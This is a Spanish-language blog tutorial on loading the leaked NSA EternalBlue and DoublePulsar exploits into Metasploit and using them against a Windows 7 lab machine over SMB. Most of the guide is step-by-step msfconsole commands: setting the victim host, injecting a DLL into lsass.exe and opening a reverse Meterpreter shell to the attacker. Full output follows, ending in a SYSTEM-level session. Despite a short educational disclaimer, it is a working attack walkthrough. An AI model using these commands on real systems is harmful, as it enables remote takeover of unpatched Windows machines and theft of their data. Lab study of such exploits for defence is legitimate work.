Esta es una guía de como integrar EternalBlue + DoublePulsar exploits de la NSA a Metasploit. Hace algunos días se publicaba la noticia que el grupo ShadowBrokers había liberado una segunda publicación de exploits de la NSA, disponibles en el GitHub.
A pesar que el framework FuzzBunch contenía una suite de exploits, lo que más llamo la atención a la comunidad de seguridad fueron los exploits llamados EternalBlue y DoublePulsar que sirven para atacar todas las versiones de windows al protocolo SMB y RDP.
Eternalblue se encarga de crear un backdoor y Doublepulsar de inyectar una dll en el proceso del sistema que nosotros queramos, ya que en una de las opciones nos pregunta en que proceso del sistema queremos inyectar la dll.
El framework FuzzBunch es parecido a metasploit, pero corre bajo windows, y como todos saben el 99% de los auditores de seguridad, pentester, researchers del mundillo de la seguridad usamos gnu/linux.
Gracias a dos investigadores Sheila Berta (Argentina) y Pablo Gonzalez (Español) ambos trabajadores de ElevenPaths podemos disfrutar de integrar EternalBlue y DoublePulsar a nuestro querido Metasploit.
Shiela Berta
http://www.twitter.com/UnaPibaGeek
http://www.semecayounexploit.com
Pablo Gonzalez
http://www.twitter.com/pablogonzalezpe
Esta guía se entrega con fines educativos para quienes estudian temas de ciberseguridad, no utilices este conocimiento con fines ilegales. No me hago responsable de lo que tu puedas hacer con este conocimiento.
Paso 1 – Elementos necesarios
- Kali linux 32bits > IP 192.168.1.117 > ATACANTE
- Windows 7 64bits > IP 192.168.1.101 > VICTIMA
1. Lo primero que vamos hacer será abrir nuestro kali linux.
2. Descargar del GitHub el archivo zip y luego descomprimirlo.
3. Copiar el archivo eternalblue_doublepulsar.rb a la siguiente dirección:
/usr/share/metasploit-framework/modules/exploits/windows/smb/
4. Crear la estructura de carpetas y copiar el contenido de la carpeta deps a /root/shadowbroker/windows/lib/x86-Windows/
5. Abrir una terminal y tipear el comando winecfg para que se cree la carpeta /root/.wine/drive_c/
6. Abrir una terminal y iniciar metasploit con el comando msfconsole
Paso 2 – Para llamar al exploit tipear use exploit/windows/smb/eternalblue_doublepulsar.
msf > use exploit/windows/smb/eternalblue_doublepulsar
Si quieres ver las opciones tipear show options
msf exploit(eternalblue_doublepulsar) > show options
Paso 3 – Setear el remote host, tipear set RHOST ip-victima
msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.101 rhost => 192.168.1.101
Paso 4 – Si quieres ver los targets disponibles tipear show targets
msf exploit(eternalblue_doublepulsar) > show targets Exploit targets: Id Name -- ---- 0 Automatic 1 Windows XP (all services pack) (x86) (x64) 2 Windows Server 2003 SP0 (x86) 3 Windows Server 2003 SP1/SP2 (x86) 4 Windows Server 2003 (x64) 5 Windows Vista (x86) 6 Windows Vista (x64) 7 Windows Server 2008 (x86) 8 Windows Server 2008 R2 (x86) (x64) 9 Windows 7 (all services pack) (x86) (x64)
Paso 5 – Setear el SO target con set target (nro id)
msf exploit(eternalblue_doublepulsar) > set target 9
Paso 6 – Setear la arquitectura del sistema a atacar, tipear set TARGETARCHITECTURE x64
msf exploit(eternalblue_doublepulsar) > set TARGETARCHITECTURE x64 targetarchitecture => x64
Paso 7 – Setear el proceso en el cual se desea injectar la DLL tipear set PROCESSINJECT lsass.exe
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT lsass.exe processinject => lsass.exe
Paso 8 – Setear el payload de 64bits para que se devuela un meterpreter reverso, tipear set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(eternalblue_doublepulsar) > set PAYLOAD windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp
Para ver las opciones tipear show options
msf exploit(eternalblue_doublepulsar) > show options
Para ver los payloads disponibles tipear show payloads
msf exploit(eternalblue_doublepulsar) > show PAYLOADS
Paso 9 – Setear la máquina atacante set LHOST ip-atacante
msf exploit(eternalblue_doublepulsar) > set LHOST 192.168.1.117 lhost => 192.168.1.117
Paso 10 – Para explotar el fallo de seguridad tipear exploit, si todo salio bien recibirá una sesión de meterpreter, si tipeamos sysinfo veremos la información del equipo vulnerado.
msf exploit(eternalblue_doublepulsar) > exploit [*] Started reverse TCP handler on 192.168.1.117:4444 [*] 192.168.1.101:445 - Generating Eternalblue XML data [*] 192.168.1.101:445 - Generating Doublepulsar XML data [*] 192.168.1.101:445 - Generating payload DLL for Doublepulsar [*] 192.168.1.101:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [*] 192.168.1.101:445 - Launching Eternalblue... [+] 192.168.1.101:445 - Pwned! Eternalblue success! [*] 192.168.1.101:445 - Launching Doublepulsar... [*] Sending stage (1189423 bytes) to 192.168.1.101 [*] Meterpreter session 1 opened (192.168.1.117:4444 -> 192.168.1.101:49158) at 2017-04-26 00:36:16 -0400 [+] 192.168.1.101:445 - Remote code executed... 3... 2... 1... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : WIN7X64 OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 System Language : es_AR Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter >
Cualquier duda puedes enviarme un email.
Autor:
Eduardo Natali
email: contacto@rootsolutions.com.ar
Twitter: https://twitter.com/enatali_
web: https://www.rootsolutions.com.ar
Visitas: 60